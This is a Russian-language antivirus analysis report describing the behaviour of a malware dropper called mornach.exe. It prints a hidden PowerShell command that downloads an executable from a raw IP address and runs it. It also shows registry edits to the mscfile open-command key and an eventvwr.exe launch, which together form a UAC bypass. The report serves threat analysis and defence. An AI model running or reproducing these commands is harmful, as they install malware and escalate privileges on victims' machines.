Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\mornach.exe'
Вредоносные функции
Загружает и запускает на исполнение
- http://193.150.13.63/mornach.exe как %temp%\mornach.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://193.150.13.63/mornach.exe','%TEMP%\mornach.exe') & reg add HKCU\Software\Classes\mscfi...
Сетевая активность
Подключается к
- '19#.#50.13.63':80
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://193.150.13.63/mornach.exe','%TEMP%\mornach.exe') & reg add HKCU\Software\Classes\mscfi...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\mornach.exe /f
- '<SYSTEM32>\eventvwr.exe'
